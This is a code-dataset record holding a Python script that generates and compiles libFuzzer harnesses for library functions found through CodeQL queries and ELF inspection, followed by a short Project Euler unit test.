| 0
| 0.733333
| 0
| 0
| 0.003346
| 0
| 0
| 0
| 0
| 0
| 0.08
| 1
| 0.066667
| false
| 0
| 0.053333
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
70e7dbb2209a3d6a80d8c40e21eb426c5c611e73
| 35,631
|
py
|
Python
|
harness.py
|
Microsvuln/autoharness
|
c016df996bdfc09ba14a7c63c03ce8a719498fb4
|
[
"MIT"
] | 254
|
2021-07-10T22:51:52.000Z
|
2022-03-05T03:47:10.000Z
|
harness.py
|
Microsvuln/autoharness
|
c016df996bdfc09ba14a7c63c03ce8a719498fb4
|
[
"MIT"
] | 3
|
2021-07-13T11:13:27.000Z
|
2022-01-03T06:16:40.000Z
|
harness.py
|
Microsvuln/autoharness
|
c016df996bdfc09ba14a7c63c03ce8a719498fb4
|
[
"MIT"
] | 21
|
2021-07-10T23:59:30.000Z
|
2022-02-17T02:28:53.000Z
|
import os
import argparse
import subprocess
import pandas as pd
import lief
from subprocess import DEVNULL, STDOUT
from ast import literal_eval
parser = argparse.ArgumentParser(description="""\
A program to help you to automatically create fuzzing harnesses.
""")
parser.add_argument('-L', '--library', help = "Specify directory to program's libraries", required=True)
parser.add_argument('-C', '--ql', help = "Specify directory of codeql modules, database, and binary", required=True)
parser.add_argument('-D', '--database', help = "Specify Codeql database", required=True)
parser.add_argument('-M', '--mode', help = "Specify 0 for 1 argument harnesses or 1 for multiple argument harnesses", required=True)
parser.add_argument('-O', '--output', help = "Output directory", required=True)
parser.add_argument('-F', '--flags', help = "Specify compiler flags (include)", required=False)
parser.add_argument('-X', '--headers', help = "Specify header files (comma seperated)", required=False)
parser.add_argument('-G', '--debug', help = "Specify 0/1 for disabling/enabling debug mode.", required=True)
parser.add_argument('-Y', '--detection', help = "Automatic header detection (0) or Function Definition (1).", required=True)
args = parser.parse_args()
def rreplace(s, old, new, occurrence):
li = s.rsplit(old, occurrence)
return new.join(li)
if (int(args.mode) == 0):
shared_objects=[]
object_functions={"output":[],"object":[]}
total_functions={"function":[], "type":[],"type_or_loc":[]}
defined_functions={"function":[], "type":[],"object": [],"type_or_loc":[]}
shared_functions={"function":[], "type":[],"object": [],"type_or_loc":[]}
cwd = os.getcwd()
if int(args.detection) == 0:
subprocess.check_output("cp " + cwd + "/onearglocation.ql " + args.ql, shell=True)
subprocess.check_output("cd "+ args.ql + ";" +args.ql+ "codeql query run onearglocation.ql -o " + args.output + "onearg.bqrs -d " + args.ql + args.database +";" + args.ql + "codeql bqrs decode --format=csv " + args.output + "onearg.bqrs -o " + args.output + "onearg.csv", shell=True)
elif int(args.detection) == 1:
subprocess.check_output("cp " + cwd + "/oneargfunc.ql " + args.ql, shell=True)
subprocess.check_output("cd "+ args.ql + ";" +args.ql+ "codeql query run oneargfunc.ql -o " + args.output + "onearg.bqrs -d " + args.ql + args.database +";" + args.ql + "codeql bqrs decode --format=csv " + args.output + "onearg.bqrs -o " + args.output + "onearg.csv", shell=True)
os.chdir(args.library)
matches = ["shared object","pie executable"]
for filename in os.listdir(args.library):
if any(x in subprocess.run(["file", filename], stdout=subprocess.PIPE).stdout.decode('utf-8') for x in matches):
print("Found shared object " + filename)
shared_objects.append(filename)
for obj in shared_objects:
object_functions["output"].append(subprocess.run(["readelf", "-a",obj], stdout=subprocess.PIPE).stdout.decode('utf-8'))
object_functions["object"].append(obj)
data = pd.read_csv(args.output + "onearg.csv")
total_functions["function"] = list(data.f)
total_functions["type"] = list(data.t)
total_functions["type_or_loc"] = list(data.g)
for index, define in enumerate(object_functions["output"]):
for index2, cur in enumerate(total_functions["function"]):
if (str(cur) in define):
defined_functions["function"].append(cur)
defined_functions["type"].append(total_functions["type"][index2])
defined_functions["object"].append(object_functions["object"][index])
defined_functions["type_or_loc"].append(total_functions["type_or_loc"][index2])
for i in range(len(defined_functions["function"])):
if ".so" not in str(defined_functions["object"][i]):
elf = lief.parse(args.library + str(defined_functions["object"][i]))
try:
addr = elf.get_function_address(str(defined_functions["function"][i]))
except:
continue
elf.add_exported_function(addr, str(defined_functions["function"][i]))
elf[lief.ELF.DYNAMIC_TAGS.FLAGS_1].remove(lief.ELF.DYNAMIC_FLAGS_1.PIE)
outfile = "lib%s.so" % str(defined_functions["function"][i])
elf.write(outfile)
shared_functions["function"].append(str(defined_functions["function"][i]))
shared_functions["type"].append(str(defined_functions["type"][i]))
shared_functions["object"].append(outfile)
shared_functions["type_or_loc"].append(str(defined_functions["type_or_loc"][i]))
else:
shared_functions["function"].append(str(defined_functions["function"][i]))
shared_functions["type"].append(str(defined_functions["type"][i]))
shared_functions["object"].append(str(defined_functions["object"][i]))
shared_functions["type_or_loc"].append(str(defined_functions["type_or_loc"][i]))
for index3 in range(len(shared_functions["function"])):
header_section = ""
if not args.headers:
if int(args.detection) == 0:
header_section = "#include \"" + os.path.basename(shared_functions["type_or_loc"][index3]) + "\"\n\n"
else:
header_section = ""
else:
header_list = args.headers.split(",")
for x in header_list:
header_section+= "#include \"" + x + "\"\n\n"
if int(args.detection) == 0:
main_section = "int LLVMFuzzerTestOneInput(" + str(shared_functions["type"][index3]) + " Data, long Size) {\n\t" + str(shared_functions["function"][index3]) + "(Data);\n\treturn 0;\n}"
else:
main_section = str(shared_functions["type_or_loc"][index3]) + " " + str(shared_functions["function"][index3]) + "(" + str(shared_functions["type"][index3])+ " testcase);\n" + "int LLVMFuzzerTestOneInput(" + str(shared_functions["type"][index3]) + " Data, long Size) {\n\t" + str(shared_functions["function"][index3]) + "(Data);\n\treturn 0;\n}"
full_source = header_section + main_section
filename = "".join([c for c in str(shared_functions["function"][index3]) if c.isalpha() or c.isdigit() or c==' ']).rstrip()
f = open(args.output + filename +".c", "w")
f.write(full_source)
if int(args.detection) == 0:
if args.flags is not None and int(args.debug) == 1:
env = os.environ.copy()
subprocess.Popen("clang -g -fsanitize=address,undefined,fuzzer " + args.flags + " -L " + args.output + " -L " +args.library + " -I" + os.path.dirname(shared_functions["type_or_loc"][index3]) + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".c -o " + args.output + filename, env=env, shell=True)
elif args.flags is not None and int(args.debug) == 0:
env = os.environ.copy()
subprocess.Popen("clang -g -fsanitize=address,undefined,fuzzer " + args.flags + " -L " + args.output + " -L " +args.library + " -I" + os.path.dirname(shared_functions["type_or_loc"][index3]) + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".c -o " + args.output + filename, env=env, shell=True, stdout=DEVNULL, stderr=STDOUT)
elif args.flags is None and int(args.debug) == 1:
env = os.environ.copy()
subprocess.Popen("clang -g -fsanitize=address,undefined,fuzzer -L " + args.output + " -L " +args.library + " -I" + os.path.dirname(shared_functions["type_or_loc"][index3]) + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".c -o " + args.output + filename, env=env, shell=True)
else:
env = os.environ.copy()
subprocess.Popen("clang -g -fsanitize=address,undefined,fuzzer -L " + args.output + " -L " +args.library + " -I" + os.path.dirname(shared_functions["type_or_loc"][index3]) + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".c -o " + args.output + filename, env=env, shell=True, stdout=DEVNULL, stderr=STDOUT)
else:
if args.flags is not None and int(args.debug) == 1:
env = os.environ.copy()
subprocess.Popen("clang -g -fsanitize=address,undefined,fuzzer " + args.flags + " -L " + args.output + " -L " +args.library + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".c -o " + args.output + filename, env=env, shell=True)
elif args.flags is not None and int(args.debug) == 0:
env = os.environ.copy()
subprocess.Popen("clang -g -fsanitize=address,undefined,fuzzer " + args.flags + " -L " + args.output + " -L " +args.library + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".c -o " + args.output + filename, env=env, shell=True, stdout=DEVNULL, stderr=STDOUT)
elif args.flags is None and int(args.debug) == 1:
env = os.environ.copy()
subprocess.Popen("clang -g -fsanitize=address,undefined,fuzzer -L " + args.output + " -L " +args.library + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".c -o " + args.output + filename, env=env, shell=True)
else:
env = os.environ.copy()
subprocess.Popen("clang -g -fsanitize=address,undefined,fuzzer -L " + args.output + " -L " +args.library + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".c -o " + args.output + filename, env=env, shell=True, stdout=DEVNULL, stderr=STDOUT)
if (int(args.detection) == 1):
for index4 in range(len(shared_functions["function"])):
header_section = ""
if not args.headers:
header_section = ""
else:
header_list = args.headers.split(",")
for x in header_list:
header_section+= "#include \"" + x + "\"\n\n"
main_section = "#include <stdlib.h>\n#include <dlfcn.h>\n\nvoid* library=NULL;\ntypedef " + str(shared_functions["type_or_loc"][index4]) + "(*" + str(shared_functions["function"][index4]) + "_t)(" + str(shared_functions["type"][index4]) + ");\n" + "void CloseLibrary()\n{\nif(library){\n\tdlclose(library);\n\tlibrary=NULL;\n}\n}\nint LoadLibrary(){\n\tlibrary = dlopen(\"" + args.library + str(shared_functions["object"][index4]) + "\",RTLD_LAZY);\n\tatexit(CloseLibrary);\n\treturn library != NULL;\n}\nint LLVMFuzzerTestOneInput(" + str(shared_functions["type"][index4]) + " Data, long Size) {\n\tLoadLibrary();\n\t" + str(shared_functions["function"][index4]) + "_t " + str(shared_functions["function"][index4]) + "_s = (" + str(shared_functions["function"][index4]) + "_t)dlsym(library,\"" + str(shared_functions["function"][index4]) + "\");\n\t" + str(shared_functions["function"][index4]) + "_s(Data);\n\treturn 0;\n}"
full_source = header_section + main_section
filename = "".join([c for c in str(shared_functions["function"][index4]) if c.isalpha() or c.isdigit() or c==' ']).rstrip()
f = open(args.output + filename +".c", "w")
f.write(full_source)
if args.flags is not None and int(args.debug) == 1:
env = os.environ.copy()
print("clang -g -fsanitize=address,undefined,fuzzer " + args.flags + " " + args.output + filename +".c -o " + args.output + filename)
subprocess.Popen("clang -g -fsanitize=address,undefined,fuzzer " + args.flags + " " + args.output + filename +".c -o " + args.output + filename, env=env, shell=True)
elif args.flags is not None and int(args.debug) == 0:
env = os.environ.copy()
subprocess.Popen("clang -g -fsanitize=address,undefined,fuzzer " + args.flags + " " + args.output + filename +".c -o " + args.output + filename, env=env, shell=True, stdout=DEVNULL, stderr=STDOUT)
elif args.flags is None and int(args.debug) == 1:
env = os.environ.copy()
subprocess.Popen("clang -g -fsanitize=address,undefined,fuzzer " + args.output + filename +".c -o " + args.output + filename, env=env, shell=True)
else:
env = os.environ.copy()
subprocess.Popen("clang -g -fsanitize=address,undefined,fuzzer " + args.output + filename +".c -o " + args.output + filename, env=env, shell=True, stdout=DEVNULL, stderr=STDOUT)
elif (int(args.mode) == 1):
shared_objects=[]
func_objects=[]
object_functions={"output":[],"object":[]}
cwd = os.getcwd()
if (int(args.detection) == 0):
subprocess.check_output("cp " + cwd + "/multiarglocation.ql " + args.ql, shell=True)
subprocess.check_output("cd "+ args.ql + ";" +args.ql+ "codeql query run multiarglocation.ql -o " + args.output + "multiarg.bqrs -d " + args.ql + args.database +";" + args.ql + "codeql bqrs decode --format=csv " + args.output + "multiarg.bqrs -o " + args.output + "multiarg.csv", shell=True)
elif (int(args.detection) == 1):
subprocess.check_output("cp " + cwd + "/multiargfunc.ql " + args.ql, shell=True)
subprocess.check_output("cd "+ args.ql + ";" +args.ql+ "codeql query run multiargfunc.ql -o " + args.output + "multiarg.bqrs -d " + args.ql + args.database +";" + args.ql + "codeql bqrs decode --format=csv " + args.output + "multiarg.bqrs -o " + args.output + "multiarg.csv", shell=True)
data = pd.read_csv(args.output + "multiarg.csv")
total_functions = data.drop_duplicates().groupby(["f", "g"], as_index=False)["t"].agg(list)
print(total_functions)
os.chdir(args.library)
defined_functions = pd.DataFrame(columns=["f","t","g","object"])
matches = ["shared object","pie executable"]
for filename in os.listdir(args.library):
if any(x in subprocess.run(["file", filename], stdout=subprocess.PIPE).stdout.decode('utf-8') for x in matches):
print("Found shared object " + filename)
shared_objects.append(filename)
for obj in shared_objects:
object_functions["output"].append(subprocess.run(["readelf", "-a",obj], stdout=subprocess.PIPE).stdout.decode('utf-8'))
object_functions["object"].append(obj)
for index, defe in enumerate(object_functions["output"]):
for index2, cur in enumerate(total_functions["f"]):
if (str(cur) in defe):
func_objects.append(object_functions["object"][index])
defined_functions = defined_functions.append([total_functions.iloc[index2,:]])
defined_functions["object"] = func_objects
defined_functions = defined_functions.to_dict(orient='list')
shared_functions={"function":[], "type":[],"object": [],"type_or_loc":[]}
for i in range(len(defined_functions["f"])):
if ".so" not in str(defined_functions["object"][i]):
elf = lief.parse(args.library + str(defined_functions["object"][i]))
try:
addr = elf.get_function_address(str(defined_functions["f"][i]))
except:
continue
elf.add_exported_function(addr, str(defined_functions["f"][i]))
elf[lief.ELF.DYNAMIC_TAGS.FLAGS_1].remove(lief.ELF.DYNAMIC_FLAGS_1.PIE)
outfile = "lib%s.so" % str(defined_functions["f"][i])
elf.write(outfile)
shared_functions["function"].append(str(defined_functions["f"][i]))
shared_functions["type"].append(str(defined_functions["t"][i]))
shared_functions["object"].append(outfile)
shared_functions["type_or_loc"].append(str(defined_functions["g"][i]))
else:
shared_functions["function"].append(str(defined_functions["f"][i]))
shared_functions["type"].append(str(defined_functions["t"][i]))
shared_functions["object"].append(str(defined_functions["object"][i]))
shared_functions["type_or_loc"].append(str(defined_functions["g"][i]))
for index3 in range(len(shared_functions["function"])):
header_section = ""
if not args.headers:
if (int(args.detection) == 0):
header_section += "#include <fuzzer/FuzzedDataProvider.h>\n#include <stddef.h>\n#include <stdint.h>\n#include <string.h>\n" + "#include \"" + os.path.basename(shared_functions["type_or_loc"][index3]) + "\"\n\n"
else:
header_section += "#include <fuzzer/FuzzedDataProvider.h>\n#include <stddef.h>\n#include <stdint.h>\n#include <string.h>\n"
else:
header_list = args.headers.split(",")
header_section += "#include <fuzzer/FuzzedDataProvider.h>\n#include <stddef.h>\n#include <stdint.h>\n#include <string.h>\n"
for x in header_list:
header_section+= "#include \"" + x + "\"\n\n"
stub = ""
marker = 1
param = ""
header_args = ""
for ty in literal_eval(shared_functions["type"][index3]):
if ty.count('*') == 1:
if "long" in ty or "int" in ty or "short" in ty and "long double" not in ty:
stub += "auto data" + str(marker) + "= provider.ConsumeIntegral<" + ty.replace("*", "") + ">();\n" + ty.replace("*", "") + "*pointer"+ str(marker) + " = &data" + str(marker) + ";\n"
param += "pointer" + str(marker) + ", "
header_args += ty + "pointer" + str(marker) + ", "
elif "char" in ty or "string" in ty:
stub += "auto data" + str(marker) + "= provider.ConsumeIntegral<" + ty.replace("*", "") + ">();\n" + ty.replace("*", "") + "*pointer"+ str(marker) + " = &data" + str(marker) + ";\n"
param += "pointer" + str(marker) + ", "
header_args += ty + "pointer" + str(marker) + ", "
elif "float" in ty or "double" in ty:
stub += "auto data" + str(marker) + "= provider.ConsumeFloatingPoint<" + ty.replace("*", "") +">();\n" + ty.replace("*", "") + "*pointer"+ str(marker) + " = &data" + str(marker) + ";\n"
param += "pointer" + str(marker) + ", "
header_args += ty + "pointer" + str(marker) + ", "
elif "bool" in ty:
stub += "auto data" + str(marker) + "= provider.ConsumeBool();\n" + ty + "pointer"+ str(marker) + " = &data" + str(marker) + ";\n"
param += "pointer" + str(marker) + ", "
header_args += ty + "pointer" + str(marker) + ", "
else:
continue
elif ty.count('*') == 2:
if "long" in ty or "int" in ty or "short" in ty and "long double" not in ty:
stub += "auto data" + str(marker) + "= provider.ConsumeIntegral<" + ty.replace("*", "") + ">();\n" + ty.replace("*", "") + "*pointer"+ str(marker) + " = &data" + str(marker) + ";\n" + ty.replace("*", "") + "**doublepointer"+str(marker) + " = &pointer"+ str(marker) + ";\n"
param += "doublepointer" + str(marker) + ", "
header_args += ty + "doublepointer" + str(marker) + ", "
elif "char" in ty or "string" in ty:
stub += "auto data" + str(marker) + "= provider.ConsumeIntegral<" + ty.replace("*", "") + ">();\n" + ty.replace("*", "") + "*pointer"+ str(marker) + " = &data" + str(marker) + ";\n" + ty.replace("*", "") + "**doublepointer"+str(marker) + " = &pointer"+ str(marker) + ";\n"
param += "doublepointer" + str(marker) + ", "
header_args += ty + "doublepointer" + str(marker) + ", "
elif "float" in ty or "double" in ty:
stub += "auto data" + str(marker) + "= provider.ConsumeFloatingPoint<" + ty.replace("*", "") + ">();\n" + ty.replace("*", "") + "*pointer"+ str(marker) + " = &data" + str(marker) + ";\n" + ty.replace("*", "") + "**doublepointer"+str(marker) + " = &pointer"+ str(marker) + ";\n"
param += "doublepointer" + str(marker) + ", "
header_args += ty + "doublepointer" + str(marker) + ", "
elif "bool" in ty:
stub += "auto data" + str(marker) + "= provider.ConsumeBool();\n" + ty.replace("*", "") + "*pointer" + str(marker) + " = &data" + str(marker) + ";\n" + ty.replace("*", "") + "**doublepointer"+str(marker) + " = &pointer"+ str(marker) + ";\n"
param += "doublepointer" + str(marker) + ", "
header_args += ty + "doublepointer" + str(marker) + ", "
else:
continue
else:
if "long" in ty or "int" in ty or "short" in ty and "long double" not in ty:
stub += "auto data" + str(marker) + "= provider.ConsumeIntegral<" + ty +">();\n"
param += "data" + str(marker) + ", "
header_args += ty + " data" + str(marker) + ", "
elif "char" in ty or "string" in ty:
stub += "auto data" + str(marker) + "= provider.ConsumeIntegral<" + ty +">();\n"
param += "data" + str(marker) + ", "
header_args += ty + " data" + str(marker) + ", "
elif "float" in ty or "double" in ty:
stub += "auto data" + str(marker) + "= provider.ConsumeFloatingPoint<" + ty +">();\n"
param += "data" + str(marker) + ", "
header_args += ty + " data" + str(marker) + ", "
elif "bool" in ty:
stub += "auto data" + str(marker) + "= provider.ConsumeBool();\n"
param += "data" + str(marker) + ", "
header_args += ty + " data" + str(marker) + ", "
else:
continue
marker+= 1
param = rreplace(param,', ','',1)
header_args = rreplace(header_args,', ','',1)
if (int(args.detection) == 0):
main_section = "extern \"C\" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {\n\tFuzzedDataProvider provider(data, size);\n\t" + stub + str(shared_functions["function"][index3]) + "(" + param + ");\nreturn 0;\n}"
else:
main_section = str(shared_functions["type_or_loc"][index3]) + " " + str(shared_functions["function"][index3]) +"(" + header_args + ");\n\nextern \"C\" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {\n\tFuzzedDataProvider provider(data, size);\n\t" + stub + str(shared_functions["function"][index3]) + "(" + param + ");\nreturn 0;\n}"
full_source = header_section + main_section
filename = "".join([c for c in str(shared_functions["function"][index3]) if c.isalpha() or c.isdigit() or c==' ']).rstrip()
f = open(args.output + filename +".cc", "w")
f.write(full_source)
if int(args.detection) == 0:
if args.flags is not None and int(args.debug) == 1:
env = os.environ.copy()
print("clang++ -g -fsanitize=address,undefined,fuzzer " + args.flags + " -L " + args.output + " -L " +args.library + " -I" + os.path.dirname(shared_functions["type_or_loc"][index3]) + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".cc -o " + args.output + filename)
subprocess.Popen("clang++ -g -fsanitize=address,undefined,fuzzer " + args.flags + " -L " + args.output + " -L " +args.library + " -I" + os.path.dirname(shared_functions["type_or_loc"][index3]) + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".cc -o " + args.output + filename, env=env, shell=True)
elif args.flags is not None and int(args.debug) == 0:
env = os.environ.copy()
subprocess.Popen("clang++ -g -fsanitize=address,undefined,fuzzer " + args.flags + " -L " + args.output + " -L " +args.library + " -I" + os.path.dirname(shared_functions["type_or_loc"][index3]) + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".cc -o " + args.output + filename, env=env, shell=True, stdout=DEVNULL, stderr=STDOUT)
elif args.flags is None and int(args.debug) == 1:
env = os.environ.copy()
subprocess.Popen("clang++ -g -fsanitize=address,undefined,fuzzer -L " + args.output + " -L " +args.library + " -I" + os.path.dirname(shared_functions["type_or_loc"][index3]) + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".cc -o " + args.output + filename, env=env, shell=True)
else:
env = os.environ.copy()
subprocess.Popen("clang++ -g -fsanitize=address,undefined,fuzzer -L " + args.output + " -L " +args.library + " -I" + os.path.dirname(shared_functions["type_or_loc"][index3]) + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".cc -o " + args.output + filename, env=env, shell=True, stdout=DEVNULL, stderr=STDOUT)
else:
if args.flags is not None and int(args.debug) == 1:
env = os.environ.copy()
subprocess.Popen("clang++ -g -fsanitize=address,undefined,fuzzer " + args.flags + " -L " + args.output + " -L " +args.library + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".cc -o " + args.output + filename, env=env, shell=True)
elif args.flags is not None and int(args.debug) == 0:
env = os.environ.copy()
subprocess.Popen("clang++ -g -fsanitize=address,undefined,fuzzer " + args.flags + " -L " + args.output + " -L " +args.library + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".cc -o " + args.output + filename, env=env, shell=True, stdout=DEVNULL, stderr=STDOUT)
elif args.flags is None and int(args.debug) == 1:
env = os.environ.copy()
subprocess.Popen("clang++ -g -fsanitize=address,undefined,fuzzer -L " + args.output + " -L " +args.library + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".cc -o " + args.output + filename, env=env, shell=True)
else:
env = os.environ.copy()
subprocess.Popen("clang++ -g -fsanitize=address,undefined,fuzzer -L " + args.output + " -L " +args.library + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".cc -o " + args.output + filename, env=env, shell=True, stdout=DEVNULL, stderr=STDOUT)
if (int(args.detection) == 1):
for index4 in range(len(shared_functions["function"])):
header_section = ""
if not args.headers:
header_section += "#include <fuzzer/FuzzedDataProvider.h>\n#include <stddef.h>\n#include <stdint.h>\n#include <string.h>\n"
else:
header_list = args.headers.split(",")
header_section += "#include <fuzzer/FuzzedDataProvider.h>\n#include <stddef.h>\n#include <stdint.h>\n#include <string.h>\n"
for x in header_list:
header_section+= "#include \"" + x + "\"\n"
stub = ""
marker = 1
param = ""
header_args = ""
for ty in literal_eval(shared_functions["type"][index4]):
if ty.count('*') == 1:
if "long" in ty or "int" in ty or "short" in ty and "long double" not in ty:
stub += "auto data" + str(marker) + "= provider.ConsumeIntegral<" + ty.replace("*", "") + ">();\n" + ty.replace("*", "") + "*pointer"+ str(marker) + " = &data" + str(marker) + ";\n"
param += "pointer" + str(marker) + ", "
header_args += ty + "pointer" + str(marker) + ", "
elif "char" in ty or "string" in ty:
stub += "auto data" + str(marker) + "= provider.ConsumeIntegral<" + ty.replace("*", "") + ">();\n" + ty.replace("*", "") + "*pointer"+ str(marker) + " = &data" + str(marker) + ";\n"
param += "pointer" + str(marker) + ", "
header_args += ty + "pointer" + str(marker) + ", "
elif "float" in ty or "double" in ty:
stub += "auto data" + str(marker) + "= provider.ConsumeFloatingPoint<" + ty.replace("*", "") +">();\n" + ty.replace("*", "") + "*pointer"+ str(marker) + " = &data" + str(marker) + ";\n"
param += "pointer" + str(marker) + ", "
header_args += ty + "pointer" + str(marker) + ", "
elif "bool" in ty:
stub += "auto data" + str(marker) + "= provider.ConsumeBool();\n" + ty + "pointer"+ str(marker) + " = &data" + str(marker) + ";\n"
param += "pointer" + str(marker) + ", "
header_args += ty + "pointer" + str(marker) + ", "
else:
continue
elif ty.count('*') == 2:
if "long" in ty or "int" in ty or "short" in ty and "long double" not in ty:
stub += "auto data" + str(marker) + "= provider.ConsumeIntegral<" + ty.replace("*", "") + ">();\n" + ty.replace("*", "") + "*pointer"+ str(marker) + " = &data" + str(marker) + ";\n" + ty.replace("*", "") + "**doublepointer"+str(marker) + " = &pointer"+ str(marker) + ";\n"
param += "doublepointer" + str(marker) + ", "
header_args += ty + "doublepointer" + str(marker) + ", "
elif "char" in ty or "string" in ty:
stub += "auto data" + str(marker) + "= provider.ConsumeIntegral<" + ty.replace("*", "") + ">();\n" + ty.replace("*", "") + "*pointer"+ str(marker) + " = &data" + str(marker) + ";\n" + ty.replace("*", "") + "**doublepointer"+str(marker) + " = &pointer"+ str(marker) + ";\n"
param += "doublepointer" + str(marker) + ", "
header_args += ty + "doublepointer" + str(marker) + ", "
elif "float" in ty or "double" in ty:
stub += "auto data" + str(marker) + "= provider.ConsumeFloatingPoint<" + ty.replace("*", "") + ">();\n" + ty.replace("*", "") + "*pointer"+ str(marker) + " = &data" + str(marker) + ";\n" + ty.replace("*", "") + "**doublepointer"+str(marker) + " = &pointer"+ str(marker) + ";\n"
param += "doublepointer" + str(marker) + ", "
header_args += ty + "doublepointer" + str(marker) + ", "
elif "bool" in ty:
stub += "auto data" + str(marker) + "= provider.ConsumeBool();\n" + ty.replace("*", "") + "*pointer" + str(marker) + " = &data" + str(marker) + ";\n" + ty.replace("*", "") + "**doublepointer"+str(marker) + " = &pointer"+ str(marker) + ";\n"
param += "doublepointer" + str(marker) + ", "
header_args += ty + "doublepointer" + str(marker) + ", "
else:
continue
else:
if "long" in ty or "int" in ty or "short" in ty and "long double" not in ty:
stub += "auto data" + str(marker) + "= provider.ConsumeIntegral<" + ty +">();\n"
param += "data" + str(marker) + ", "
header_args += ty + " data" + str(marker) + ", "
elif "char" in ty or "string" in ty:
stub += "auto data" + str(marker) + "= provider.ConsumeIntegral<" + ty +">();\n"
param += "data" + str(marker) + ", "
header_args += ty + " data" + str(marker) + ", "
elif "float" in ty or "double" in ty:
stub += "auto data" + str(marker) + "= provider.ConsumeFloatingPoint<" + ty +">();\n"
param += "data" + str(marker) + ", "
header_args += ty + " data" + str(marker) + ", "
elif "bool" in ty:
stub += "auto data" + str(marker) + "= provider.ConsumeBool();\n"
param += "data" + str(marker) + ", "
header_args += ty + " data" + str(marker) + ", "
else:
continue
marker+= 1
param = rreplace(param,', ','',1)
header_args = rreplace(header_args,', ','',1)
main_section = "#include <stdlib.h>\n#include <dlfcn.h>\n\nvoid* library=NULL;\ntypedef " + str(shared_functions["type_or_loc"][index4]) + "(*" + str(shared_functions["function"][index4]) + "_t)(" + header_args + ");\nvoid CloseLibrary()\n{\nif(library){\n\tdlclose(library);\n\tlibrary=NULL;\n}\n}\nint LoadLibrary(){\n\tlibrary = dlopen(\"" + args.library + str(shared_functions["object"][index4]) + "\",RTLD_LAZY);\n\tatexit(CloseLibrary);\n\treturn library != NULL;\n}\nextern \"C\" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {\n\tFuzzedDataProvider provider(data, size);\n\t\n\tLoadLibrary();\n\t" + stub + str(shared_functions["function"][index4]) + "_t " + str(shared_functions["function"][index4]) + "_s = (" + str(shared_functions["function"][index4]) + "_t)dlsym(library,\"" + str(shared_functions["function"][index4]) + "\");\n\t" + str(shared_functions["function"][index4]) + "_s(" + param + ");\n\treturn 0;\n}"
full_source = header_section + main_section
filename = "".join([c for c in str(shared_functions["function"][index4]) if c.isalpha() or c.isdigit() or c==' ']).rstrip()
f = open(args.output + filename +".cc", "w")
f.write(full_source)
if args.flags is not None and int(args.debug) == 1:
env = os.environ.copy()
subprocess.Popen("clang++ -g -fsanitize=address,undefined,fuzzer " + args.flags + " " + args.output + filename +".cc -o " + args.output + filename, env=env, shell=True)
elif args.flags is not None and int(args.debug) == 0:
env = os.environ.copy()
subprocess.Popen("clang++ -g -fsanitize=address,undefined,fuzzer " + args.flags + " " + args.output + filename +".cc -o " + args.output + filename, env=env, shell=True, stdout=DEVNULL, stderr=STDOUT)
elif args.flags is None and int(args.debug) == 1:
env = os.environ.copy()
subprocess.Popen("clang++ -g -fsanitize=address,undefined,fuzzer " + args.output + filename +".cc -o " + args.output + filename, env=env, shell=True)
else:
env = os.environ.copy()
subprocess.Popen("clang++ -g -fsanitize=address,undefined,fuzzer " + args.output + filename +".cc -o " + args.output + filename, env=env, shell=True, stdout=DEVNULL, stderr=STDOUT)
else:
print("Invalid Mode")
| 87.330882
| 956
| 0.551991
| 4,075
| 35,631
| 4.741595
| 0.062331
| 0.055895
| 0.052169
| 0.029604
| 0.915899
| 0.891781
| 0.888469
| 0.875013
| 0.870666
| 0.86932
| 0
| 0.005351
| 0.265668
| 35,631
| 407
| 957
| 87.545455
| 0.733117
| 0
| 0
| 0.738916
| 0
| 0.03202
| 0.240745
| 0.071315
| 0.004926
| 0
| 0
| 0
| 0
| 1
| 0.002463
| false
| 0
| 0.017241
| 0
| 0.022167
| 0.014778
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
70fa31ca462d8c29cda0dd257c4cdb432171d000
| 152
|
py
|
Python
|
tests/test_problem_24.py
|
jcthomassie/euler
|
97e23a1976d40fec7c9c9136f82bdcb145a35f1f
|
[
"MIT"
] | null | null | null |
tests/test_problem_24.py
|
jcthomassie/euler
|
97e23a1976d40fec7c9c9136f82bdcb145a35f1f
|
[
"MIT"
] | 12
|
2020-11-18T00:15:52.000Z
|
2021-07-04T18:21:03.000Z
|
tests/test_problem_24.py
|
jcthomassie/euler
|
97e23a1976d40fec7c9c9136f82bdcb145a35f1f
|
[
"MIT"
] | null | null | null |
from euler.problem_24 import solve
from .utils import validate_solution
def test_solution() -> None:
validate_solution(solve, answer=2783915460)
| 19
| 47
| 0.789474
| 20
| 152
| 5.8
| 0.7
| 0.275862
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091603
| 0.138158
| 152
| 7
| 48
| 21.714286
| 0.793893
| 0
| 0
| 0
| 0
